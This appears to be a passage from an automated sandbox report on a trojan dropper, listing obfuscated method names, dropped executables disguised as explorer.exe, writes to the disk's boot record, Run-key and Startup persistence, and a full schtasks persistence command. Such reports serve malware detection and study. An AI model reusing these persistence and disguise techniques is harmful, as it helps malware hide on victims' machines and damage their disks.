                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF6001 pushad ; iretd 5_2_00007FF848CF6012
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF5637 push esi; iretd 5_2_00007FF848CF5652
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848CF5425 push esp; iretd 5_2_00007FF848CF5452
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeCode function: 8_2_00007FF848C34B38 pushfd ; retn 5F52h8_2_00007FF848C4E0B1
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeCode function: 8_2_00007FF848C31426 push es; ret 8_2_00007FF848C31427
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeCode function: 8_2_00007FF848C3DDF8 pushad ; retf 8_2_00007FF848C3DDF9
                      Source: BootstrapperV21.exe.0.dr, 5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ.csHigh entropy of concatenated method names: 'C2mRYKFxbo8mjMI6EC1TSRx8VtcUIKNn5v7mEQYFFGFsBI', 'zPc7yff1hUjcgLmlJ9W990tBvLQkEcvG0ZugUtHMFVDWvo', '_5Ks36JSiOQNfV48SlqKc8P59xnfjRYXqTWq5OZxpsbQUmd', 'V1GYXlB36cLqmm24aHoL6TwuCrGusetrpW5a5ita4sN1GD'
                      Source: BootstrapperV21.exe.0.dr, I6s71bMp9PKNAdO1kgmXPjSPsK2cg2TokcKQvhGocphGIJQswb2Z3W12Nxnva.csHigh entropy of concatenated method names: 'xWT8jiIvOh2GW1qEBwNoJ58pi2urAplZdKMnFzBCI2RiJezkdZua3uO0gYPvA', '_24jmqkdsmCcWnr0ML1QnEbv3mGO8wNrOQ5jgsbutzr5ePhE9BGqlR9ZlEHnfc', 'i4v3npYnMyHkBm1EqmP6eIW1oZn3ro0Q7InqrvDFtTbhb707QQArtm9T5pxvh', 'vVOpKIfbQbgnI5uz3xbPU', 'tDlFFG6ufaxuhtRIKvN8I', 'BIpLswp9pzcg8rpgF4gGy', 'UiN498PeQPbztTncmB5WQ', 'Ki9RIDIwl6SoeUzcuJ4Lp', 'lo0YxcU63W6R2bx7GwNq8', 'cgybRzYtOGSpzOvVFtWVj'
                      Source: BootstrapperV21.exe.0.dr, W8IM5Si5Xe5Ar6LfZE7GAFHW5UtG1SlAKDgHeqY7XPQe4uRBX6nWtuc1yaPfVXXhRrYORLVsT1WIz2d6Wthobn.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'VI80LdBHlhxjKNQtTl18CHvQlbFPuVzIl82JLMwDiaogAr', 'ECAFhD3QhhrOpo7IrDCDqhfvEjK5Bq6JQEMs4ZKwQZ72rW', '_7QhPqKIX1UpzWPWQUkfOgYsaV3WOtm6zBm5pigHVCdeQRu', 'OLWccK1MhTLNitMzo72kZmp5jHLXsq9ObOhZk8zGoemKOC'
                      Source: BootstrapperV21.exe.0.dr, kkMEjSvcL2RYZLOOEZEuWDrlPovLn.csHigh entropy of concatenated method names: 'KqkKfF3WoFg3qrMOdzIzLfie7VgeT', '_3p9GpXSOMcX2V3c3K1921t3Kri15m', 'y5gsZykZdAXb8JXDJIx7LGVsLNQEi', 'c8bvTP8P6gjK2XWbf0bypcuD6HE2M', 'LpRdxN0MgQNcU62yYMdlLXVdCBDff', '_3iNGpi2BZIxoC5YOmErZYE61oKM0L', 'DMTjzEaq9p29cNElerjewqqrlfP81', 'J09nPo9WZ7qNhec1dpY8AQxduSj11', '_4OuWjQWw7fLem0HRRsLuAh5YOx9Vx', 'M8DlQGlquPJz9cysh4qdW4BZdetsM'
                      Source: BootstrapperV21.exe.0.dr, rFTZMkX7tWQg80xKOqPGY7F5Zx8lT.csHigh entropy of concatenated method names: 'UqlJIM7eNdl7t6xzRAD4nCthC6tIT', 'dli1WpCs2AFFTtcGckqPdKl3JhpnY', 'Y5so5pOhmc15k3ryzVkvUXvu3itfM', 'wnbVM8CqlgOFsbbp3R2esRupASU5L2aueul3NA1gUf6kOmkI6LLfs8r4KHci6gXDJQ7qm9jEaBgf4z', 'dAS6rStRdDwJuz4Ua0XjXWZ7BDP7sgQB6ZJRd55YMdMlJ0pqUWftDBuVS2fDZwXotE0Der1OkQ3JtS', 'ODbM1lXY6NpliX3pLSnFfbkX3dZI48LQ664pUzJHWEGY8bd5iIuJ6tCqORUIzBjacXz8pyFBSBZ61T', 'r6MBXtW7UHksZdVBCEiQGOBuiT9x3hZ4pZsfXFOScaN8zNiY4Do9h8d0F9cW8TnSdpz41FXKrc1JsO', 'CDsXB7QlHkliBee5jYxpRP6UMzYmqguF5kPMU6JXEB13ESpKqNJQtlgRYrxTcSyjJBCD1u1zf3MnYJ', 'GbC1IYpJYSnnsy66B1rpPauGWMHCDQjb0casMtEXyV8CbCed2vLW2MHLmJAJwK3yk0rnFYgutog6G9', 'Evo3s4GjMtOUxz34bl0PW60TMQOMxqmlnkcsRxwdqaJvIDnjCOAwTh8aXiSvmW9pSQNPAvP9fySdCp'
                      Source: BootstrapperV21.exe.0.dr, iE2JG8OyzoUgBKQJy6KnMXFpYrHoU2FZ7MRP4mITsrlhsV9Gt1A6RK4AAqykDpnKsG9wGtnz2w903OpUVP5W4K.csHigh entropy of concatenated method names: 'O6J9Y5cgwntMrgYPzcDWwLSZWzdSV2LR7YCylyAYY8JzwkromRfhwKoaBLHA0rSy2b7hgLayTv6KV5p7oOOYtL', 'jZZuq4D8N6pKXRO2FeUi3WfZG4gYezzi2lKet7eqAXvYefNgpN9nRA2yPXiAOzeH8gRkJLfgrpH6VWYiegsr0I', 'zwpVQZUUqfyLK3mkZNRwX7Lqld90P', 'k36cmNBAiJZt9rTIa0VnKAu1XQjjc', 'LOtqh265hoGbo5e908yXLr6Jhn21Z', 'z6Chi5o7dFPcr7Ls63MvODSCVNvrz', '_2tonB1AZ7O3J0BoOaQPPwZAdqxFLg', 'zgywq7RdMcJyRyefAkTNa8N9q73By', 'bOvjsV4Gb7Lcy2g9vPDp1z0w3mV3W', 'PGrm6nnxr4GhxoJXB8Gw1QeWuwVqo'
                      Source: BootstrapperV21.exe.0.dr, xyilDDsUjw2dYanZBJsTKmg5W2LZJ.csHigh entropy of concatenated method names: 'c8vgyakmf1R2oQIDL31EsCJUuvl5q', 'f1fqLRir4yBdmWZhzqvn8WotjFESe3RebDrSO8kuOl6scwKx8v1biro3emIia638w4or2857k0nPfD', '_68JXPe27zBpy0yUKgeemNKznjQyAMYOVfnvvKHSuHuvHOLV3ldaCTArXPDNdhwgLqXiUY7Ay1HpG9H', '_0uKwSSnMKEpdr7Ub868ukgeUSkHU6YNxH3LRzsFnjjGUuMKG171xxX7ounAYJHLoskfEx5wHz2lesi', 'USJLdHE3jU6HXnG7w2lPAdKRtVmw46HPQYwOvs050TFayoSRFKCZZlB67Hijio49wptKZMMd64Dopj'
                      Source: BootstrapperV21.exe.0.dr, b5Cow6riCVRT3gYLHI1XT4HkkiqT7vzZ46palIeoMDQEh3qmI5wOBaklRoRv3ZmvlZce3flpVfDyklQuYyJB5d.csHigh entropy of concatenated method names: 'qehUYOBeDcpaYtW1eqFSfZty50Gm6QG1LIMOrdUcbCoB3ibMmncqgXNoH6pAMnw3JI8imwnxTjT34wu4o3CHTD', '_318kuJsDp1W535VUBzSqjfId9jxPrqZ7KciWzsKwbVm7wuFj3HOs4blADR18rom7P1FREd3VBgMd0etDNTbZ4y', 'BmqfnKf69yM2ZV7gZgb6JzbD10nfHpJs8tEWagrL3JvshKmC1fr5TtfTwT1EOnHhuvuLAGo36EymzrS9srwXZq', 'FUrFNPGHFdct2Zmt4jkPM5RgyBNsmzi4U2TzJ08DUiD8rlzpxv7cT6Ee2HA8w4SNJfY9DZcJCSNEpb62paOmxE', '_7OvtfDb6JRiJ4KKqSL4OrfwUkLaleZIIGQe8MvRmvXzvShFh6gKvb3QFDKSdeKDQcW2DDxb0144bJkKl3krr01', 'Sxl4CYfkNtQTypC5EWHdpdTid1VT1DWnUOkzQl4VQ2MRJpRYXXc4y1Sh5HbWl5ZsIwuM9aAwgE3naVVhjR11ow', 'UAsMndEYHOysD8ftrC9938jbKKMEGo7GcweO1H6GZUufyz', 'VbwXq3kbJ4msyIXwmlS0A6pI6I5kPIl9euTCH03tkGNLde', 'rVyhSTn9qoTQESBUMF65iuRJ73XtSg3IceFl69RfLevdhH', 'aahYyP1e4W8MA1dQoNM0H6BoGdQsIfGBySwJKEkdj3oS4x'
                      Source: BootstrapperV21.exe.0.dr, 65bWXagIT9MC7apne2lv4JhVNzwdT.csHigh entropy of concatenated method names: 'UfuahBT79qv9T04vz6JD3XXirpcqi', 'fMthJqi1SjYEtxNOL7KI9', 'UOfgdQziS7otovm6KlZuU', 'tSCG9cBSl9ZeUM7TPyCnr', '_8WnwsUsRQYi8suXzd8Icw'
                      Source: BootstrapperV21.exe.0.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.csHigh entropy of concatenated method names: '_7NnuJPGeJbph6edpCoGIjYiQDSh3o', 'PF8902c0ggCmm2TE6DSjEZBlM5DZz', 'D1CEH3eJ3CRGpUDfk1bTDGiHF322x', 'K7fl2LdzMQ7LmtVoeGeJ95nNwa6nx', 'wgaq38YMdDLeK5XrRBBHuvkHVS4xZ', 'FyPJwls6IflsNuScxdfjBTZfhwgcC', 'jirZsUAACKMuPL7MIiVP4oWqunwAu', 'J0pFnA0Ic2odpYwSlPA54q2Vwqn3a', 'NLY32Ky6jWF7aTXXNVlDcUN1YqTeC', 'BejRqO8WqCih5jJyoscq5xKJ0c6l3'
                      Source: BootstrapperV21.exe.0.dr, SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.csHigh entropy of concatenated method names: 'zQgiKUkNsgGLiyTGjnv5OEdT26753', 'sLVHXpBUgGCcuimjFX0XuJ7N120qo', 'NSmAx12zjX2NCsyTjjBzP9PXaTXgg', 'nUbAj9OJm6ysYQdbrbOj7jterOXSV', 'zSfvDd5pkQpSHerVM5zQIVCRewrNE', '_8Ci1rdyt9x647r02HpYuqYjZbCZny', 'dWT0luGBpR1UvAxi4sTIBc36jJ9Ke', 'ef71gGpEcB2HS0GaItz9zFtPrDSGR', 'dPvLNHNtNMh2Vl1zsfm3PviicrrOtaWnFTYLeVOojb4HIG86hC8hny7yZ5ykl', 'okRpewScgtnBy8iQXQYuuLJs1h2H0SYgX6ZrxpJ1j5u6sm1IL0Ir0SqDXrVJQ'
                      Source: BootstrapperV21.exe.0.dr, 8ySmmJwVqH31e10jy4auG3uFvCRQh.csHigh entropy of concatenated method names: 'ZH0k1wYhRD2p1GXtK4wuPWz5rpPII', 'qtlddTmM34biU8WAurFmlmj9ejv4V', '_3mIQudcWYgarbK7Qi88aM9up5qu1J', 'BjNFn6Cyv08aX4eEW9rQNYkFOrnTb', '_7aI2H2VojOG5LGwmAFK3z', 'adJqzMBZwSKH8NGvmVpmN', 'OEGya98x7eFw6wuUKTp7C', 'Hv8VqcFwjkSO5vDTn5dAm', 'aBqKJ6xXIVLzRXDwUVVh0', 'tXlOc7AvPE0MrAUvZYh0N'
                      Source: explorer.exe.2.dr, 5Flt4FCN45M8UGh92b6OrGXGEpktWVjS10uS9LOIxNnFCa4Fhy7SLYnnOyhOCWkA2CId3wZhkxr82v12hJ4xBQ.csHigh entropy of concatenated method names: 'C2mRYKFxbo8mjMI6EC1TSRx8VtcUIKNn5v7mEQYFFGFsBI', 'zPc7yff1hUjcgLmlJ9W990tBvLQkEcvG0ZugUtHMFVDWvo', '_5Ks36JSiOQNfV48SlqKc8P59xnfjRYXqTWq5OZxpsbQUmd', 'V1GYXlB36cLqmm24aHoL6TwuCrGusetrpW5a5ita4sN1GD'
                      Source: explorer.exe.2.dr, I6s71bMp9PKNAdO1kgmXPjSPsK2cg2TokcKQvhGocphGIJQswb2Z3W12Nxnva.csHigh entropy of concatenated method names: 'xWT8jiIvOh2GW1qEBwNoJ58pi2urAplZdKMnFzBCI2RiJezkdZua3uO0gYPvA', '_24jmqkdsmCcWnr0ML1QnEbv3mGO8wNrOQ5jgsbutzr5ePhE9BGqlR9ZlEHnfc', 'i4v3npYnMyHkBm1EqmP6eIW1oZn3ro0Q7InqrvDFtTbhb707QQArtm9T5pxvh', 'vVOpKIfbQbgnI5uz3xbPU', 'tDlFFG6ufaxuhtRIKvN8I', 'BIpLswp9pzcg8rpgF4gGy', 'UiN498PeQPbztTncmB5WQ', 'Ki9RIDIwl6SoeUzcuJ4Lp', 'lo0YxcU63W6R2bx7GwNq8', 'cgybRzYtOGSpzOvVFtWVj'
                      Source: explorer.exe.2.dr, W8IM5Si5Xe5Ar6LfZE7GAFHW5UtG1SlAKDgHeqY7XPQe4uRBX6nWtuc1yaPfVXXhRrYORLVsT1WIz2d6Wthobn.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'VI80LdBHlhxjKNQtTl18CHvQlbFPuVzIl82JLMwDiaogAr', 'ECAFhD3QhhrOpo7IrDCDqhfvEjK5Bq6JQEMs4ZKwQZ72rW', '_7QhPqKIX1UpzWPWQUkfOgYsaV3WOtm6zBm5pigHVCdeQRu', 'OLWccK1MhTLNitMzo72kZmp5jHLXsq9ObOhZk8zGoemKOC'
                      Source: explorer.exe.2.dr, kkMEjSvcL2RYZLOOEZEuWDrlPovLn.csHigh entropy of concatenated method names: 'KqkKfF3WoFg3qrMOdzIzLfie7VgeT', '_3p9GpXSOMcX2V3c3K1921t3Kri15m', 'y5gsZykZdAXb8JXDJIx7LGVsLNQEi', 'c8bvTP8P6gjK2XWbf0bypcuD6HE2M', 'LpRdxN0MgQNcU62yYMdlLXVdCBDff', '_3iNGpi2BZIxoC5YOmErZYE61oKM0L', 'DMTjzEaq9p29cNElerjewqqrlfP81', 'J09nPo9WZ7qNhec1dpY8AQxduSj11', '_4OuWjQWw7fLem0HRRsLuAh5YOx9Vx', 'M8DlQGlquPJz9cysh4qdW4BZdetsM'
                      Source: explorer.exe.2.dr, rFTZMkX7tWQg80xKOqPGY7F5Zx8lT.csHigh entropy of concatenated method names: 'UqlJIM7eNdl7t6xzRAD4nCthC6tIT', 'dli1WpCs2AFFTtcGckqPdKl3JhpnY', 'Y5so5pOhmc15k3ryzVkvUXvu3itfM', 'wnbVM8CqlgOFsbbp3R2esRupASU5L2aueul3NA1gUf6kOmkI6LLfs8r4KHci6gXDJQ7qm9jEaBgf4z', 'dAS6rStRdDwJuz4Ua0XjXWZ7BDP7sgQB6ZJRd55YMdMlJ0pqUWftDBuVS2fDZwXotE0Der1OkQ3JtS', 'ODbM1lXY6NpliX3pLSnFfbkX3dZI48LQ664pUzJHWEGY8bd5iIuJ6tCqORUIzBjacXz8pyFBSBZ61T', 'r6MBXtW7UHksZdVBCEiQGOBuiT9x3hZ4pZsfXFOScaN8zNiY4Do9h8d0F9cW8TnSdpz41FXKrc1JsO', 'CDsXB7QlHkliBee5jYxpRP6UMzYmqguF5kPMU6JXEB13ESpKqNJQtlgRYrxTcSyjJBCD1u1zf3MnYJ', 'GbC1IYpJYSnnsy66B1rpPauGWMHCDQjb0casMtEXyV8CbCed2vLW2MHLmJAJwK3yk0rnFYgutog6G9', 'Evo3s4GjMtOUxz34bl0PW60TMQOMxqmlnkcsRxwdqaJvIDnjCOAwTh8aXiSvmW9pSQNPAvP9fySdCp'
                      Source: explorer.exe.2.dr, iE2JG8OyzoUgBKQJy6KnMXFpYrHoU2FZ7MRP4mITsrlhsV9Gt1A6RK4AAqykDpnKsG9wGtnz2w903OpUVP5W4K.csHigh entropy of concatenated method names: 'O6J9Y5cgwntMrgYPzcDWwLSZWzdSV2LR7YCylyAYY8JzwkromRfhwKoaBLHA0rSy2b7hgLayTv6KV5p7oOOYtL', 'jZZuq4D8N6pKXRO2FeUi3WfZG4gYezzi2lKet7eqAXvYefNgpN9nRA2yPXiAOzeH8gRkJLfgrpH6VWYiegsr0I', 'zwpVQZUUqfyLK3mkZNRwX7Lqld90P', 'k36cmNBAiJZt9rTIa0VnKAu1XQjjc', 'LOtqh265hoGbo5e908yXLr6Jhn21Z', 'z6Chi5o7dFPcr7Ls63MvODSCVNvrz', '_2tonB1AZ7O3J0BoOaQPPwZAdqxFLg', 'zgywq7RdMcJyRyefAkTNa8N9q73By', 'bOvjsV4Gb7Lcy2g9vPDp1z0w3mV3W', 'PGrm6nnxr4GhxoJXB8Gw1QeWuwVqo'
                      Source: explorer.exe.2.dr, xyilDDsUjw2dYanZBJsTKmg5W2LZJ.csHigh entropy of concatenated method names: 'c8vgyakmf1R2oQIDL31EsCJUuvl5q', 'f1fqLRir4yBdmWZhzqvn8WotjFESe3RebDrSO8kuOl6scwKx8v1biro3emIia638w4or2857k0nPfD', '_68JXPe27zBpy0yUKgeemNKznjQyAMYOVfnvvKHSuHuvHOLV3ldaCTArXPDNdhwgLqXiUY7Ay1HpG9H', '_0uKwSSnMKEpdr7Ub868ukgeUSkHU6YNxH3LRzsFnjjGUuMKG171xxX7ounAYJHLoskfEx5wHz2lesi', 'USJLdHE3jU6HXnG7w2lPAdKRtVmw46HPQYwOvs050TFayoSRFKCZZlB67Hijio49wptKZMMd64Dopj'
                      Source: explorer.exe.2.dr, b5Cow6riCVRT3gYLHI1XT4HkkiqT7vzZ46palIeoMDQEh3qmI5wOBaklRoRv3ZmvlZce3flpVfDyklQuYyJB5d.csHigh entropy of concatenated method names: 'qehUYOBeDcpaYtW1eqFSfZty50Gm6QG1LIMOrdUcbCoB3ibMmncqgXNoH6pAMnw3JI8imwnxTjT34wu4o3CHTD', '_318kuJsDp1W535VUBzSqjfId9jxPrqZ7KciWzsKwbVm7wuFj3HOs4blADR18rom7P1FREd3VBgMd0etDNTbZ4y', 'BmqfnKf69yM2ZV7gZgb6JzbD10nfHpJs8tEWagrL3JvshKmC1fr5TtfTwT1EOnHhuvuLAGo36EymzrS9srwXZq', 'FUrFNPGHFdct2Zmt4jkPM5RgyBNsmzi4U2TzJ08DUiD8rlzpxv7cT6Ee2HA8w4SNJfY9DZcJCSNEpb62paOmxE', '_7OvtfDb6JRiJ4KKqSL4OrfwUkLaleZIIGQe8MvRmvXzvShFh6gKvb3QFDKSdeKDQcW2DDxb0144bJkKl3krr01', 'Sxl4CYfkNtQTypC5EWHdpdTid1VT1DWnUOkzQl4VQ2MRJpRYXXc4y1Sh5HbWl5ZsIwuM9aAwgE3naVVhjR11ow', 'UAsMndEYHOysD8ftrC9938jbKKMEGo7GcweO1H6GZUufyz', 'VbwXq3kbJ4msyIXwmlS0A6pI6I5kPIl9euTCH03tkGNLde', 'rVyhSTn9qoTQESBUMF65iuRJ73XtSg3IceFl69RfLevdhH', 'aahYyP1e4W8MA1dQoNM0H6BoGdQsIfGBySwJKEkdj3oS4x'
                      Source: explorer.exe.2.dr, 65bWXagIT9MC7apne2lv4JhVNzwdT.csHigh entropy of concatenated method names: 'UfuahBT79qv9T04vz6JD3XXirpcqi', 'fMthJqi1SjYEtxNOL7KI9', 'UOfgdQziS7otovm6KlZuU', 'tSCG9cBSl9ZeUM7TPyCnr', '_8WnwsUsRQYi8suXzd8Icw'
                      Source: explorer.exe.2.dr, zOzCAaervtLAvIZ89MzEAzE4FwmJZ.csHigh entropy of concatenated method names: '_7NnuJPGeJbph6edpCoGIjYiQDSh3o', 'PF8902c0ggCmm2TE6DSjEZBlM5DZz', 'D1CEH3eJ3CRGpUDfk1bTDGiHF322x', 'K7fl2LdzMQ7LmtVoeGeJ95nNwa6nx', 'wgaq38YMdDLeK5XrRBBHuvkHVS4xZ', 'FyPJwls6IflsNuScxdfjBTZfhwgcC', 'jirZsUAACKMuPL7MIiVP4oWqunwAu', 'J0pFnA0Ic2odpYwSlPA54q2Vwqn3a', 'NLY32Ky6jWF7aTXXNVlDcUN1YqTeC', 'BejRqO8WqCih5jJyoscq5xKJ0c6l3'
                      Source: explorer.exe.2.dr, SdfvHZ1Yvp3COerPCZaD70Bb2f6q8.csHigh entropy of concatenated method names: 'zQgiKUkNsgGLiyTGjnv5OEdT26753', 'sLVHXpBUgGCcuimjFX0XuJ7N120qo', 'NSmAx12zjX2NCsyTjjBzP9PXaTXgg', 'nUbAj9OJm6ysYQdbrbOj7jterOXSV', 'zSfvDd5pkQpSHerVM5zQIVCRewrNE', '_8Ci1rdyt9x647r02HpYuqYjZbCZny', 'dWT0luGBpR1UvAxi4sTIBc36jJ9Ke', 'ef71gGpEcB2HS0GaItz9zFtPrDSGR', 'dPvLNHNtNMh2Vl1zsfm3PviicrrOtaWnFTYLeVOojb4HIG86hC8hny7yZ5ykl', 'okRpewScgtnBy8iQXQYuuLJs1h2H0SYgX6ZrxpJ1j5u6sm1IL0Ir0SqDXrVJQ'
                      Source: explorer.exe.2.dr, 8ySmmJwVqH31e10jy4auG3uFvCRQh.csHigh entropy of concatenated method names: 'ZH0k1wYhRD2p1GXtK4wuPWz5rpPII', 'qtlddTmM34biU8WAurFmlmj9ejv4V', '_3mIQudcWYgarbK7Qi88aM9up5qu1J', 'BjNFn6Cyv08aX4eEW9rQNYkFOrnTb', '_7aI2H2VojOG5LGwmAFK3z', 'adJqzMBZwSKH8NGvmVpmN', 'OEGya98x7eFw6wuUKTp7C', 'Hv8VqcFwjkSO5vDTn5dAm', 'aBqKJ6xXIVLzRXDwUVVh0', 'tXlOc7AvPE0MrAUvZYh0N'

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with benign system names
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
                      Infects the VBR (Volume Boot Record) of the hard disk
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeFile written: \Device\Harddisk0\DR0 offset: 512
                      Uses ipconfig to lookup or modify the Windows network settings
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Writes directly to the primary disk partition (DR0)
                      Source: C:\Users\user\AppData\Local\Temp\TrojanXD.exeFile written: \Device\Harddisk0\DR0 offset: 512 length: 512
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeFile created: C:\Users\user\AppData\Local\Temp\TrojanXD.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile created: C:\Users\user\AppData\Local\Temp\voosiq.exeJump to dropped file
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeFile created: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeJump to dropped file
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeFile created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
